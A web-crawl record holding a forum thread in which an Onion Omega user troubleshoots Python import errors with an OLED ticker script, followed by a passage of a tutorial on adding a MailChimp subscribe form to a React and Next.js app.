in your favorite feed reader!Subscribe to our
https://developers.google.com/web/updates/2019/02/using-twa?hl=zh-cn
CC-MAIN-2019-35
refinedweb
2,122
54.42
Oled sample project I am trying to learn using the sample stock ticker project on the wiki page. I have the oled expansion correctly installed, I can use the console and write to the oled. However when I try to run the stock_script.py I get an error on the import of urllib in line 4 and error on import of json on line 5 import: not found I am attempting to understand where these would be imported from so I can make certain that I have the correct modules installed. I did expand the storage to the usb storage and installed the full python environment. Any help would be appreciated As an update, I am using the sample on the wiki page Oled Expansion. Here is the code: #!/usr/bin/env python import urllib import json myfile = open('/usr/bin/ticker.txt', 'r') rg=myfile.read() site=""+rg jfile=urllib.urlopen(site) jsfile=jfile.read() jsfile=jsfile.replace("\n","") jsfile=jsfile.replace("/","") jsfile=jsfile.replace("]","") jsfile=jsfile.replace("[","") a=json.loads(jsfile) ticker=a['t'] price=a['l_fix'] info=ticker+":"+price print info So the errors I get when attempting to run this are Import: not found This is for both the lines calling for urllib and json to be imported into the environment. This fails I am guessing because I do not had urllib or json either installed, or in the correct location for the command to find them. Any help? @Dan-Johnson What was the command you used to install python? If you did: opkg update opkg install python-light You only have the smallest possible Python install which would explain the missing modules. Try running the following to install the full version of Python: opkg update opkg install python I installed the full version of python. I wonder if it is looking for those modules in some other directory? they appear to be installed, but still get the errors. @Dan-Johnson Odd... Can you try running opkg list-installed | grep -i pythonand posting the output? package python (2.7.9-5) installed in root is up to date. root@Omega-2044:/# opkg list-installed | grep -i python python - 2.7.9-5 python-base - 2.7.9-5 python-codecs - 2.7.9-5 python-compiler - 2.7.9-5 python-ctypes - 2.7.9-5 python-db - 2.7.9-5 python-decimal - 2.7.9-5 python-distutils - 2.7.9-5 python-email - 2.7.9-5 python-gdbm - 2.7.9-5 python-light - 2.7.9-5 python-logging - 2.7.9-5 python-multiprocessing - 2.7.9-5 python-ncurses - 2.7.9-5 python-openssl - 2.7.9-5 python-pydoc - 2.7.9-5 python-setuptools - 7.0-1 python-sqlite3 - 2.7.9-5 python-unittest - 2.7.9-5 python-xml - 2.7.9-5 root@Omega-2044:/# - Rajiv Puri @Dan-Johnson can you check that you have the correct the urllib and json modules? They should be listed in the /usr/lib/python2.7 directory. in the /usr/lib/python2.7 directory I have a json directory installed, then a urllib.py file How do I check which version these are? I opened the urllib.py file and there is not version information included. Are they correct since they are installed in the python2.7 directory? I did not specifically install these. I have considered flashing the whole thing and starting from scratch to get a clean install. Perhaps there is something there that is wonky and just needs to be reinstalled? @Dan-Johnson yeah, maybe a factory reset will do the trick. Let us know how it goes! ok so i removed both the oled display and the usb expansion. Then did a factory reset. reinstalled the usb expansion, and keyed in the scripts. shut down the onion, and reinstalled the oled display. rebooted and ran the scripts. I got the correct display on the oled. I think I read somewhere that there is a bug in the oled control library that is slated for a future firmware update with the error 'write" I got the error, but the script works. Thanks for the help @Dan-Johnson Glad to hear that it worked out! Can you post the error message you get from the OLED library? Btw, the board is the Omega, the team behind it is Onion :)
http://community.onion.io/topic/647/oled-sample-project
CC-MAIN-2018-22
refinedweb
734
70.29
The power of pair programming/vulcan mind melding A “mind-meld” is a technique for sharing thoughts, experiences, memories, and knowledge with another individual, essentially a limited form of telepathy. This is probably as ‘agile’ as I ever want to get, and probably one of the more controversial aspects of my job (other than some of the chat that comes out from a male dominated office). This is the time to put your ego aside, turn your introvert inside out, stop being such a control freak, put your superhero cape away and for god sake brush your teeth! Pair programming isn’t for everyone, but I for one love it (with the right person of course) and here is why! 1. Skill Transfer This is where you take off your spandex and roll away the cape, no matter how good you think you are, there is almost always a better way of doing something, or a way to simplify and to make clean. The most I’ve ever got out of PP is learning from the other person, no matter what their skillset is, what forte or flavour they code in, someone always has a nifty trick or a new way to do something. Mostly for me, I’ve learnt how to improve my workflow. Learning how to properly provision an environment for development, or how to use the power of Grunt to build my frontend for deployment. Its a sad thing, when someone doesn’t want to learn something new, either sad or naive, or maybe they’re just a dick! 2. Sanity Check This is another ego/superhero moment. Sometimes we miss things, whether it be spelling your namespace wrong, missing a closing bracket, locking the front door, leaving the oven on. The list is endless, and a human trait is to sometimes get things wrong. If everyone got everything right, then everyone would win, sport would be pretty bland, and we probably wouldn’t invent anything new. If theres no problem, there is no need to innovate. Think of the person next to you as your safety net, or your very own fireman's trampoline. Just a note to all you haters that blast people for getting things wrong, tough shit hombre, thats life! 3. Knowledge Share This isn’t like a skills transfer, more that you have two developers who know the ins and outs of the code and how the application works. This is always helpful, I wouldn’t want to be the sole guy everyone comes to about everything, I’d get bored…and annoyed. Its also good when the inevitable happens, and a developer (or anyone in a job because it’s a normal thing to do) moves onto a new role. 4. Make ‘Friends’ Say you work in a team of 8 developers but you’re all working on the same mammoth application. Your pairing may change every week, and that’s a great way to talk to ‘Fred’ the introvert who sits in the corner dribbling over server architecture design. ‘Fred’ might actually have a bit more to him than that, and after your time together (this is not a love story) you might actually get on, then again, he or you, might just stay introvert and sad, and dribble in your separate corners. 5. Faster Coding Skillz I’m not entirely sure this is true but I’m going to write it anyway, why, because its my medium! My opinion is that PP is quicker. No need to revisit or rewrite, the instant code review produces cleaner code in less time, and if you do need to revisit, at least two people have oversight over the code. So there you have it, I’ll be sure to write up a followup about the disadvantages, but for me, not enjoying PP is more about a clash of personalities with your fellow programmer. Some of them really won’t take off their superhero cape for the day. If you liked this, please hit me up with a “Recommend”. Thank you.
https://medium.com/web-design-and-development/the-power-of-pair-programming-vulcan-mind-melding-fa4718130bfe?source=rss-17d7ab8b466------2
CC-MAIN-2017-26
refinedweb
678
64.54
This page contains an archived post to the Java Answers Forum made prior to February 25, 2002. If you wish to participate in discussions, please visit the new Artima Forums. Type code out of range, is -84 Posted by Senthoor on December 08, 2001 at 10:30 PM import java.io.*; class test implements java.io.Serializable{ public String x = null; public int i = 0; public test(String y, int x) { this.x = y; this.i = x; }} public class FileIO { public FileIO() { } public static void main(String[] args) { try { // writing to the file FileOutputStream fo = new FileOutputStream("x.dat"); ObjectOutputStream oo = new ObjectOutputStream(fo); test x = new test("Senthoor",5); oo.writeObject(x); oo.flush(); oo.close(); fo.close(); // writing again to the file fo = new FileOutputStream("x.dat", true); oo = new ObjectOutputStream(fo); test y = new test("Luxman",10); oo.writeObject(y); oo.flush(); oo.close(); fo.close(); //reading from the file FileInputStream fi = new FileInputStream("x.dat"); ObjectInputStream oi = new ObjectInputStream(fi); oi.readObject(); test z = (test)oi.readObject(); System.out.println("String : " + z.x); System.out.print("int : " + z.i); fi.close(); } catch(Exception e) { System.out.println("ERROR : " + e.toString()); } }} Whats wrong with this code... I am getting Type code out of range, is -84 when I execute this code. I can write objects for the first time and close the stream and read them back. However when I open the file in append mode and add some more objects and try to read them I am getting Type code out of range, is -84... Please help me... Senthoor
http://www.artima.com/legacy/answers/Dec2001/messages/71.html
CC-MAIN-2017-51
refinedweb
263
68.47
By Bruno Borges Principal Product Manager, Developer Engagement Continuing our commitment to openness and collaboration, we are excited to announce the open sourcing of the Bare Metal Cloud Services Command-line interface (CLI). The project is dual licensed under the Apache License 2.0 and Universal Permissive License 1.0 and welcomes your contributions and derivative projects. GUIs are great for a limited set of easy tasks but CLIs allow advanced users to truly harness the potential of cloud automation. This is also true for the Bare Metal Cloud Services (BMCS) CLI. The tool provides a comprehensive set of commands to directly access all functionality from the command-line. First things first, you have to install the CLI. Here are some common ways to quickly get through this step: For more detailed instructions to install the CLI, please refer to the CLI documentation. To have the CLI walk you through the first time setup process, step by step, use the following command: $ bmcs setup config Next step is to find what the tool can do. The CLI commands have the following syntax: $ bmcs <service> <type> <action> <options> For example, you can use the below command to create a bucket: $ bmcs os bucket create -ns mynamespace --name mybucket --metadata '{"key1":"value1","key2":"value2"}' --compartment-id $C You can get help on any command with --help or -?. For example: $ bmcs --help $ bmcs os bucket --help You can find the complete command reference in the detailed documentation. We believe open sourcing empowers our customers and partners to have a strong say in the future direction and development for our products and services. We also realize that there are overlaps in the problems users face. Open sourcing provides a venue for developers to share their solutions with others, and even include their contributions in the final version of the tool. Now all those advantages are available for the BMCS CLI, just as with our other open-source BMCS developer tools: It's easy to contribute to the BMCS CLI, or any of our other open source projects. You can make a pull requests under The Oracle Contributor Agreement (OCA). Check the CONTRIBUTING file for more detailed instructions. We are strongly committed to building a powerful CLI. We will continue our development to maintain parity with the new features on BMCS. We are confident that this open source collaboration will drive enhancements to the CLI experience of BMCS customers. We invite all developers out there to come join us in our endeavor to build the best cloud CLI, by becoming active contributors on GitHub today! Related Content:
https://blogs.oracle.com/open-sourcing-bare-metal-cloud-services-cli-v2
CC-MAIN-2020-50
refinedweb
432
51.99
One aspect to consider while developing an IoT project is the device power management. With the rise of Internet of Things, the optimization of the battery-operated devices is an important aspect that can make a difference. The Device Power Management in the IoT is a challenging task because a device could be always powered up and could be located everywhere. Often IoT devices are located remotely and they must use a battery to work. IoT Device Power Management: How to implement it The device power management in IoT involves all the steps related to the designing process and it is very important to take into account how the device will behave and how this behavior affects energy consumption. The battery capacity and the device behavior are two of the most important aspects. In more details, the device behavior can have a bad impact on energy management. Usually, we can model an IoT device power consumption using three different areas: - Microcontroller - Radio operations - Sensors and actuators A typical IoT device use case is: - Acquiring data from sensors - Sending and receiving data - Controlling actuators Usually a an IoT device uses one or more sensors to acquire information related to the environment. The data acquired are used locally or remotely to take decisions. This information are acquired using sensors and each sensor has specific power consumption. Therefore it is very important to select the sensors carefully in order to optimise power management. An IoT device during its operations can send and receive data remotely. Usually, several IoT devices are connected to an IoT gateway that collects such information and sends them to the cloud. The sending and receiving operation is one of the most expensive tasks from the power management point of view. This operation involves the radio connection (cellular, Wi-Fi, Bluetooth, etc.). Finally, using some specific business logic locally or remotely, an IoT device can control one or more actuators. The microcontroller controls all the operations and it is the brain of the device and in order to work, it needs power. Implementing power management in IoT Now we have introduced some aspects related to the power management in an IoT device, it is time to describe how to implement it. To do it, we will describe some best practices from the development point of view covering how to write the code that takes into account the device power management. The easiest way we use to develop an IoT application using Arduino, ESP8266 and other compatible devices is implementing the code in the loop() method. For example, when we have to acquire data from a sensor at specific time intervals we simply add the delay(..) method specifying how long the device should wait before starting again and repeat the same tasks. This approach isn’t the best one when we consider the power management aspect. There are different ways we can use to achieve a better result. In more details, for example, an ESP8266 device has four different modes to “sleep” or save the battery: - No sleep - Modem sleep - Light sleep - Deep-sleep This table describes these different sleep modes: No sleep This is the most inefficient way to use this device. It is always on. Modem-sleep mode This mode is enabled only when the ESP8266 is connected to a Wifi. In this mode, the ESP8266 turns off the WiFi module between two DTIM Beacon interval. The ESP8266 turns on again the WiFi module before the next Beacon. This is sleep mode is used when it is necessary to keep the CPU on. Light-sleep mode This is mode is very similar to the Modem-sleep mode but in this mode, ESP8266 suspends the CPU and turns off the clock. This mode is more efficient than the previous mode. In Light-sleep mode, the ESP8266 should be woken up using a GPIO pin. Deep-sleep mode In this mode, everything is turned off except the RTC (Real Time Clock) , so that the ESP8266 can be turned on periodically. This is the most the most efficient mode. The deep-sleep mode can be used in scenarios where the device should send data at specific intervals. This is the example of an application that uses sensors. The application reads sensor data, sends the values and the goes into deep-sleep mode. More interesting resources: How to use Cayenne IoT with ESP8266 and MQTT: Complete Step-by-step practical guide Build an IoT soil moisture monitor using Arduino with an IFTTT alert system How to use the power management in ESP8266 to reduce the power consumption Now it is time to build a simple example describing how to use the deep-sleep mode to handle power management in IoT. Let us suppose that our application has to read the temperature and send it to a remote IoT platform. The application structure must be: - Read data from sensor - Send data - Goes into the deep-sleep mode for a predefined time interval - Repeat again from the first step How to enable deep-sleep mode in ESP8266 The first step is enabling the deep-sleep mode. The schematic below shows how to do it: In this case, we are connecting the pin D0 to the RST. Tip When you upload the code to your ESP8266 do not connect D0 to RST The ESP8266 code below, show how to do it: #include <ESP8266WiFi.h> const char* WIFI_SSID="---"; const char* WIFI_PWD="----"; void setup() { Serial.begin(9600); connectToWifi(); // send data Serial.println("Going to deep sleep for 15 sec"); ESP.deepSleep(15e6); } void loop() { // put your main code here, to run repeatedly: } void connectToWifi() { Serial.print("Connecting to Wifi:"); Serial.println(WIFI_SSID); WiFi.begin(WIFI_SSID, WIFI_PWD); while (WiFi.status() != WL_CONNECTED) { if (WiFi.status() == WL_CONNECT_FAILED) { Serial.println("Error during WiFi connection- "); delay(10000); } delay(1000); } Serial.print("Wifi IP:"); Serial.println(WiFi.localIP()); } In this case, the ESP8266 goes into the deep sleep mode for 15 seconds. When it wakes up it starts from the beginning again, connecting to the WiFi and so on. It is possible to use this approach to wake up the ESP8266 using a button to start it. We will cover it in another post. Summary At the end of this post, hopefully, you gained the knowledge about how to manage the power in IoT using some example. The power management is very important in IoT, so it is important to take it into account.
https://www.javacodegeeks.com/2019/02/device-power-management.html
CC-MAIN-2019-09
refinedweb
1,070
53.81
Block Dude For the past few weeks, I have been brainstorming about creating a circuit with a motor that reacts according to the distance or a gesture of the user. The circuit I used to build this week consists of an Arduino Uno, one LED, one phototransistor. Meet Block Dude. He is very lonely and constantly looking you, his friend. As you get closer to him (the phototransistor), he becomes alert and looks at you. He has a little blue led on his head that blinks when he is alert. To code my Arduino, I imported the servo library and used the map function to adjust the range of the analog input to a range of 0 to 180. I used the delay() to create an effect where the face seems to look for you when you are away from the phototransistor. In reality, this is caused from the motor twitching, but I just slowed it down so the face appears to be searching. #include <Servo.h> // include the servo library Servo servoMotor; // creates an instance of the servo object to control a servo int servoPin = 3; // Control pin for servo motor int led = 2; void setup() { Serial.begin(9600); // initialize serial communications servoMotor.attach(servoPin); // attaches the servo on pin 3 to the servo object pinMode(led, OUTPUT); }, 180, 40, 480); // move the servo using the angle from the sensor: servoMotor.write(servoAngle); delay(1000); // blink led if it senses you if (analogValue <80) { digitalWrite(led, LOW); delay(90); digitalWrite(led, HIGH); delay(90); } else { // turn on led at all times digitalWrite(led, HIGH); } } The most time-consuming part for me was the fabrication. I wanted to make it visually appealing and hide some of the wires. I started by changing the type of lever that is screwed onto the motor. Then, I cut a 2 small pieces of cardboard and covered them with yellow tape. First, I experimented with placing the led light in-between the 2 pieces of cardboard but that proved to be too bulky. Next, I tried using the natural grooves of the cardboard to place the wires of the led lights. This placement was more efficient since the head could not be perfectly flat. I fastened the head to the motor’s gear by wrapping thin metal wire through the grooves of the cardboard head. These wires were concealed by using more tape. Lastly, I drew on the face and he came alive! Posted in: Physical Computing
https://julielizardo.com/2019/10/04/block-dude/
CC-MAIN-2020-05
refinedweb
413
70.94
Some time ago, I wrote a tutorial about parser combinators. The tutorial shows ho we can, with a few primitive parsers (e.g. for text and regular expressions) and combinators, we can gradually compose simple parsers to build more complex parsers. Alongside the post, I also published a JavaScript library called pcomb to play with the introduced concepts. The library features many parser combinators that can be used to compose complex parsers. In this post, I’d like to walk the interested reader through an example of using parser combinators. We’ll implement a parser for tabular CSV file format. First, we need a precise definition for our language. Usually we should use a formal notation like EBNF to define the grammar, but here to keep things simple, and also because the language is not too complicated, we’ll just do with a textual definition. Quoting Wikipedia page:. So for our purpose, assuming we have a string containing the CSV file content - A CSV is a collection of records separated by line breaks. - A record is a collection of fields separated by commas. Let’s try to translate this into actual code. First attempt We begin by importing some basic parsers import { text, regex, eof } from "pcomb" textallows us to match (=parse) a given literal string regexallows us to parse a string that matches a given regular expression eofensures that we’ve reached the end of file (there are no more superfluous charachters on the input string). Next we define our most basic parsers. const lineBreak = text("\n") const comma = text(",") const field = regex(/[^\n,]*/) We may also call the above definitions lexical scanners. If you’ve consulted some other parser tutorials, you may have encountered the following description of a parsing workflow | Lexical scanner | --> | Parser | We first run a lexical scanning phase on the input string, where we transform the sequence of raw input characters into a sequence of tokens (e.g. numbers, operators, simple variables). Then we feed this token sequence into a parsing phase that assembles them into more complex structures (e.g. arithmetic expressions). With parser combinators, we can follow a similar process, except that we’re using the same abstraction. Since everything is a parser, we’re just assembling basic parsers into more complex parsers. Note that, for each one of above parsers (or lexers if you want), the result of parsing an input string is a string representing the matched slice. For example, field will return a substring matching any character except \n and ,. Next, we define records, remember the definition was a collection of fields separated by commas const record = field.sepBy(comma) The definition is rather self-descriptive. The A.sepBy(SEP) method transforms a parser for a thing a into a parser of a collection of zero or more things a sep a sep a .... SEP can be an arbitrary parser (as long as it doesn’t overlap with the definition of A). More concretely, the result of parsing an input string with record will return an array of strings (or raise an error if the input string doesn’t match the expected format) Finally the definition of a parser for the whole CSV input was A CSV is a collection of records separated by line breaks Which translates to const csv = record.sepBy(lineBreak).skip(eof) record.sepBy(lineBreak) should be obvious by now. skip(eof) ensure that there are no more characters left on the input string. The full source code is given below import { text, regex, eof } from "pcomb" const lineBreak = text("\n") const comma = text(",") const field = regex(/[^\n,]*/) const record = field.sepBy(comma) const csv = record.sepBy(lineBreak).skip(eof) To run the parser on an input string we use the parse method. It either returns the parse result or raises an error. For example: function parse(parser, source) { try { return parser.parse(source) } catch (error) { console.error(error) } } parse(csv, "Id,Name\n1,Yahya\n2,Ayman") // => [["Id","Name"],["1","Yahya"],["2","Ayman"]] Improving the parser One caveat with the above parser appears when we try to parse an input like Year,Make,Model,Description,Price 1997,Ford,E350,"ac, abs, moon",3000.00 When parsing the above input we get ;[ ["Year", "Make", "Model", "Description", "Price"], ["1997", "Ford", "E350", '"ac', " abs", ' moon"', "3000.00"], ] Our header (first line) presupposes that each record should contain 5 fields, yet the parsed result for the second line contains 7 fields. The issue is that the 4th field of the second line contains commas ( ,) embedded within quotes ( ""). It’s not exactly that the implementation of our parser was wrong, the real issue is our definition was not accurate enough to account for quoted fields, i.e. fields which use quotes to embed characters that would normally be interpreted as tokens (newlines or commas) in our defined language. So to ‘fix’ our language we must improve our description with a definition for field content - A CSV is a collection of records separated by line breaks. - A record is a collection of fields separated by commas. A field is either - a quoted string - an unquoted string - A quoted string is a sequence of characters between quotes ( "..."). Within the quotes a character "must be prefixed by another "(like "abc""xyz"). - An unquoted string is any string not starting with a quote ", any character except \nand ,are allowed. Let’s translate this into code, first we need to update our imports import { text, regex, oneOf, eof } from "pcomb" We add an import for the oneOf combinator, we’ll see the usage later. Next we update our ‘tokens’ const lineBreak = text("\n") const comma = text(",") // new tokens const unquoted = regex(/[^\n,]*/) const quoted = regex(/"(?:[^"]|"")*"/).map(s => s.slice(1, s.length - 1).replace(/""/g, '"') ) We introduce 2 new tokens to reflect the new definition. unquoted is basically the same as the previous field. quoted introduces the new feature of embedding reserved tokens within quotes. We also add some post cleanup using the map method, A.map(f) method allows transforming the result of a parser a into result f(a) using the given function f. In our example, we remove the surrounding quotes and convert any eventual embedded double quotes back into single quotes. Next we update the definition of field, remember the new definition is now A field is either a quoted or unquoted string const field = oneOf(quoted, unquoted) The oneOf(...ps) combinator introduces a choice between 2 (or more) parsers. The resulting parser will match any of the given parsers (or fail if none matches). The rest of the definitions remain unchanged. The whole new implementation becomes import { text, regex, oneOf, eof } from "pcomb" const lineBerak = text("\n") const comma = text(",") const unquoted = regex(/[^\n,]*/) const quoted = regex(/"(?:[^"]|"")*"/).map(s => s.slice(1, s.length - 1).replace(/""/g, '"') ) const field = oneOf(quoted, unquoted) const record = field.sepBy(comma) const csv = record.sepBy(lineBerak).skip(eof) Using on the previous input const result = parse( csv, `Year,Make,Model,Description,Price 1997,Ford,E350,"ac, abs, moon",3000.00` ) console.log(JSON.stringify(result)) We get the correct number of fields in the records. [ ["Year","Make","Model","Description","Price"], ["1997","Ford","E350","ac, abs, moon","3000.00"] ] Addendum: Enforcing more constraints So far, we’ve seen how to enforce what could be (roughly) described as syntactic constraints with our parser definitions. Our parser could also be further improved to enforce some semantic constraints. For example, observe the following input Year,Make,Model,Description,Price 1997,Ford,E350,"ac, abs, moon",3000.00 1999,Chevy,"Venture ""Extended Edition""","",4900.00 1996,Jeep,Grand Cherokee,"MUST SELL!, 5000.00, The first line, the header, presupposes that each record in the CSV table should contain 5 columns. But the last line mistakenly contains a trailing comma ,. Parsing the above input will succeed, but as a result we get a table where all records do not contain the same number of columns. We could enforce this kind of constraints by running a post-parse traversal on the parse result to ensure that the number of fields is consistent in the resulting table. But this looks like a sub-optimal solution, for example if we’re parsing a huge CSV file, and the above kind of error is located in one of the first lines, we don’t need to continue parsing the rest of the input, we can stop parsing immediately at the wrong line. A more optimal solution would be detecting those semantic errors as early as possible during parsing. The solution involves usually maintaining some user defined state during parsing and placing appropriate guards at specific parse steps (guards usually test a parse result against some actual user defined state). Since I intend to keep this a short tutorial, I’ll leave it here. And (maybe :)) I’ll write another post with a more detailed walk through on how to enforce semantic constraints. Links - A codesanbox demo featuring a demo of the CSV and many other example parsers
https://abstractfun.com/2018-12-15-csv-parser/
CC-MAIN-2021-31
refinedweb
1,502
54.22
Simulink.AliasType Property Dialog Box Use a Simulink.AliasType object to rename data types for signal, state, and parameter data in a model. For examples and programmatic information, see Simulink.AliasType. - Base type The data type to which this alias refers. The default is double. To specify another data type, such as half, select the data type from the adjacent drop–down list of standard data types or enter the data type name in the edit field. To specify a fixed-point data type, you can use a call to the fixdtfunction, such as fixdt(0,16,7). To specify the characteristics of the type interactively, expand the Data Type Assistant and set Mode to Fixed point. For information about using the Data Type Assistant, see Specify Data Types Using Data Type Assistant. You can, with one exception, specify a nonstandard data type, e.g., a data type defined by a Simulink.NumericTypeobject, by entering the data type name in the edit field. The exception is a Simulink.NumericTypewhose DataTypeModeis Fixed-point: unspecified scaling. Note Fixed-point: unspecified scalingis a partially specified type whose definition is completed by the block that uses the Simulink.NumericType. Forbidding its use in alias types avoids creating aliases that have different base types depending on where they are used. - Data scope Specifies whether the data type definition is imported from, or exported to, a header file during code generation. The possible values are: - Header file if Data scope equals type.h Importedor Exported, or defaults to if Data scope equals model_types.h Auto. By default, the generated #includedirective uses the preprocessor delimiter #include <myTypes.h>, specify Header file as <myTypes.h>. - Description Describes the usage of the data type referenced by this alias.
https://fr.mathworks.com/help/simulink/ug/simulink-aliastype-property-dialog-box.html
CC-MAIN-2022-21
refinedweb
289
50.53
presence of XML as way of data sharing, LINQ to XML got introduced in C# 3.0 to work effectively and efficiently with XML data. LINQ to XML API contains classes to work with XML. All classes of LINQ to XML are in namespace System.XML.Linq. Objective of this article is to understand, how could we work with LINQ to XML? Let us start with below image. It depicts an isomorphic relationship between XML elements and cross-ponding LINQ to XML classes. XML Element is fundamental XML constructs. An Element has a name and optional attributes. An XML Elements can have nested Elements called Nodes also. XML Element is represented by XElement class in LINQ to XML. It is defined in namespace System.Xml.Linq. And it inherits the class XContainer that derives from XNode. Below tasks can be performed using XElement class - It can add child element. - It can delete child element. - It can change child element. - It can add attributes to an element. - It can be used to create XML tree - It is used to serialize the content in a text form XElement class xmltree = new XElement("Root", new XElement("Data1", new XAttribute("name", "Dj"), 1), new XElement("Data2", new XAttribute("ID", "U18949"), new XAttribute("DEPT","MIT"),2), new XElement("Data3", "3"), new XElement("Data4", "4") ); Console.WriteLine(xmltree); On executing above code you should get below output, Let us stop here and examine how Attributes of XML List<Author> CreateAuthorList() { List<Author> list = new List<Author>() { new Author(){Name="Dhananjay Kumar",NumberofArticles= 60}, new Author (){Name =" Pinal Dave ", NumberofArticles =5}, new Author () {Name = " Deepti maya patra",NumberofArticles =55}, new Author (){Name=" Mahesh Chand",NumberofArticles = 700}, new Author (){Name =" Mike Gold",NumberofArticles = 300}, new Author(){Name ="John Papa",NumberofArticles = 200}, new Author (){Name ="Shiv Prasad Koirala",NumberofArticles=100}, new Author (){Name =" Tim ",NumberofArticles =50}, new Author (){Name=" J LibertyNumberofArticles =50} }; return list; } <strong></strong> class Author { public string Name { get; set; } public int NumberofArticles { get; set; } } XML tree can be constructed from List of Authors as below code listing, Code Listing 3 List<Author> list = CreateAuthorList(); XElement xmlfromlist = new XElement("Authors", from a in list select new XElement("Author", new XElement("Name", a.Name), new XElement("NumberOfArticles", a.NumberofArticles))); <strong></strong> xmlfromlist.Save(@"e:\\a.xml"); <strong></strong> Above code snippet will create Authors as root element. There may be any number of Authors as child element inside root element Authors. There are two other elements Name and NumberOfArticles are in XML tree. There may be scenario when you want to create XML tree from a SQL Server table. You need to follow below steps, - Create Data Context class using LINQ to SQL class - Retrieve data to parse as XML - Create XML tree - Create elements and attributes using XElement and XAttribute - WCF is name of table. Code Listing 4 DataClasses1DataContext context = new DataClasses1DataContext(); var res = from r in context.WCFs select r; XElement xmlfromdb = new XElement("Employee", from a in res select new XElement("EMP", new XElement("EmpId", a.EmpId), new XElement("Name", a.Name))); xmlfromlist.Save(@"e:\\a.xml"); <strong></strong> x. - Download content of XML file as string using WebClient class. - Parse XML file using LINQ to XML - Bind parsed result as item source of node, - Function is taking string as input parameter. Here we will pass e.Result from Downloadcompletedstring event. - Creating an instance of XDocument by parsing string - Reading each descendants or element on Xml file and assigning value of each attribute to properties of Entity class (Student). We need to create an Entity class to map the data from XML File. I am going to create a class Student with properties exactly as the same of attributes of Student Element in XML file. Student class is listed as below, Code Listing 11 public.
http://debugmode.net/2011/10/
CC-MAIN-2014-41
refinedweb
631
56.15
by Timur (Tima) Zhiyentayev How to integrate MailChimp in a JavaScript web app If you are a blogger, publisher, or business owner who does content marketing, having a newsletter is a must. In this tutorial, you will learn how to add Mailchimp integration to a simple JavaScript app. You’ll ultimately build a form for guest users to subscribe to a newsletter. I wrote this tutorial for a junior/mid-career web developer. The tutorial assumes some basic knowledge of React, JavaScript, and HTTP. You’ll start the tutorial with a boilerplate app, gradually add code to it, and finally test Mailchimp API integration. The boilerplate app is built with React, Material-UI, Next, Express, Mongoose, and MongoDB. Here’s more about the boilerplate. As mentioned above, our goal is to create a feature that allows a guest user to subscribe to a MailChimp newsletter. The user subscribes by manually adding their email address to a form on your website. Here is an overview of the data exchange that will occur between the client (browser) and server: - A user adds their email address to the form and clicks submit - The click triggers a client-side API method that sends the email address from the user’s browser to your app server - The client-side API method sends a POST request to a unique Express route - The Express route passes the email address to a server-side API method that sends a POST request to Mailchimp’s server - The email address is successfully added to your Mailchimp list Specifically, you will achieve the following by the end of this tutorial: - Create a Subscribepage with a subscription form - Define an API method called fetch()method - Define an Express route '/subscribe' - Define a subscribe()API method that sends a POST request to Mailchimp's API server - Test out this data exchange with Postman and as a guest user Getting started For this tutorial, we’ll use code located in the 1-start folder of our builderbook repo. If you don’t have time to run the app locally, I deployed this example app at: To run the app locally: - Clone the builderbook repo to your local machine with: git clone git@github.com:builderbook/builderbook.git - Inside the 1-startfolder, run yarnor npm installto install all packages listed in package.json. To add Mailchimp API to our app, we will install and learn about the following packages: Let’s start by putting together the Subscribe page. In addition to learning about the Mailchimp API, you will get familiar with Next.js, a framework for React apps. A key feature of Next.js is server-side rendering for initial page load. Other features include routing, prefetching, hot code reload, code splitting, and preconfigured webpack. Subscribe page We will define a Subscribe component as a child of ES6 class using extends. Instead of: const Subscribe = React.createClass({}) We will use: class Subscribe extends React.Component {} We will not specify ReactDOM.render() or ReactDOM.hydrate explicitly, since Next.js implements both internally. A high-level structure for our Subscribe page component is: import React from 'react';// other imports class Subscribe extends React.Component { onSubmit = (e) => { // check if email is missing, return undefined // if email exists, call subscribeToNewsletter() API method }; render() { return ( // form with input and button ); }} export default Subscribe; Create a subscribe.js file inside the pages folder of 1-start. Add the above code to this file. We will fill the // other imports section as we go. Our form will have only two elements: (1) an input element for email addresses and (2) a button. Since our boilerplate app is integrated with Material-UI, we’ll use TextField and Button components from the Material-UI library. Add these two imports to your subscribe.js file: import TextField from 'material-ui/TextField';import Button from 'material-ui/Button'; Put the TextField and Button components inside a <form> element: <form onSubmit={this.onSubmit}> <p>We will email you when a new tutorial is released:</p> <TextField type="email" label="Your email" style={styleTextField} required /> <p /> <Button variant="raised" color="primary" type="submit"> Subscribe </Button></form> You can see that we passed some props to both TextField and Button components. For a complete list of props you can pass, check out the official docs for TextField props and Button props. We need to get an email address specified in TextField. To access the value of TextField, we add React's ref attribute to it: inputRef={(elm) => { this.emailInput = elm;}} We access the value with: this.emailInput.value Two notes: - We did not use ref="emailInput", since React documentation recommends using the contextual object this. In JavaScript, thisis used to access an object in the context. If you configure Eslint properly, you would see an Eslint warning for this rule. - Instead of ref, we used inputRefsince the TextFieldcomponent is not an inputHTML element. TextFieldis a component of Material-UI and uses the inputRefprop instead of ref. Before we define our onSubmit function, let's run our app and take a look at our form. Your code at this point should look like: pages/subscribe.js import React from 'react';import Head from 'next/head';import TextField from 'material-ui/TextField';import Button from 'material-ui/Button'; import { styleTextField } from '../components/SharedStyles';import withLayout from '../lib/withLayout'; class Subscribe extends React.Component { onSubmit = (e) => { // some code };); A few notes: - In Next.js, you can specify page title and description using Head. See how we used it above. - We added a styleTextFieldstyle. We keep this style in components/SharedStyles.js, so that it's reusable and can be imported into any component or page. - We wrapped the Subscribecomponent with withLayout. The higher-order component withLayoutensures that a page gets a Headercomponent and is server-side rendered on initial load. We access the Subscribe page at the /subscribe route, since Next.js creates the route for a page from the page's file name inside the pages folder. Start your app with yarn dev and go to The form looks as expected. Try changing the values passed to different props of the TextField and Button components. For example, change text for the label prop to Type your email and change the Button variant prop to flat: Before we continue, click the Log in link in the Header. Note the loading progress bar at the top of the page. We implemented this bar with Nprogress, and we will show it while waiting for our code to send an email address to a Mailchimp list. Our next step is to define the onSubmit function. The purpose of this function is to get the email address from TextField, pass that email address to an API method Before we call <form> element and d efine email: - Prevent the default behavior of sending form data to a server with: e.preventDefault(); - Let’s define a local variable this.emailInput.valueif both this.emailInputand this.emailInput.valueexist, otherwise it is null: const email = (this.emailInput && this.emailInput.value) || null; - If if (this.emailInput && !email) { return;} So far we have: onSubmit = (e) => { e.preventDefault(); const email = (this.emailInput && this.emailInput.value) || null; if (this.emailInput && !email) { return; } // call subscribeToNewsletter(email)}; To call our API method async/await construct together with try/catch. We cover async callbacks, Promise.then, and async/await in detail in our book. To use async/await, prepend async to an anonymous arrow function like this: onSubmit = async (e) => Providing subscribeToNewsletter(email) should return a Promise (and it does — we define this method later in this tutorial using 